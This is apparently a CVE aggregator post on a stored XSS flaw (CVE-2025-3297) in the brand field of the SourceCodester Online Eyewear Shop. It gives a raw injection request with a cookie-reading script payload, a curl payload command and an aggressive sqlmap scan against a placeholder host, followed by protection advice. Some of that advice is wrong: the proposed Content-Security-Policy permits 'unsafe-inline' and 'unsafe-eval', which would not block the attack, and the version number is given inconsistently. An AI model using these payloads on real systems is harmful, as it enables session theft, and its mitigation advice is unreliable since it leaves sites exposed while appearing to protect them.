SourceCodester Online Eyewear Shop 10, Cross-Site Scripting (XSS), CVE-2025-3297 (Medium)

How the CVE Works

The vulnerability exists in `/classes/Master.php?f=save_product` due to improper sanitization of the `brand` parameter. Attackers can inject malicious JavaScript payloads via this parameter, leading to stored XSS. When an admin or user views the affected product, the script executes in their browser, enabling session hijacking, defacement, or phishing. The attack is remotely exploitable with low privileges (PR:L) and requires user interaction (UI:P). CVSS 4.0 rates it 5.1 (Medium) due to limited impact on confidentiality (VC:N) and integrity (VI:L).

DailyCVE Form

Platform: SourceCodester Online Eyewear Shop
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 04/08/2025

What Undercode Say:

Exploitation:

1. Payload Injection:

POST /classes/Master.php?f=save_product HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
brand=<script>alert(document.cookie)</script>

2. Triggering XSS:

Visit any page displaying the `brand` value (e.g., product listings).

Protection:

1. Input Sanitization:

$brand = htmlspecialchars($_POST['brand'], ENT_QUOTES, 'UTF-8');

2. Content Security Policy (CSP):

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'

3. WAF Rules:

location ~ .php$ {
set $block_xss 0;
if ($args ~ "<script") { set $block_xss 1; }
if ($block_xss = 1) { return 403; }
}

Detection:

1. CURL Check:

curl -X POST -d "brand=<img src=x onerror=alert(1)>" http://target.com/classes/Master.php?f=save_product

2. SQLi/XSS Scanners:

sqlmap -u "http://target.com/classes/Master.php?f=save_product" --data="brand=test" --risk=3 --level=5

Mitigation:

Update to patched versions.
Disable script execution in user-input fields.
Audit all $_GET/$_POST handlers.

References:

VulDB Entry
OWASP XSS Cheat Sheet

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3297
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram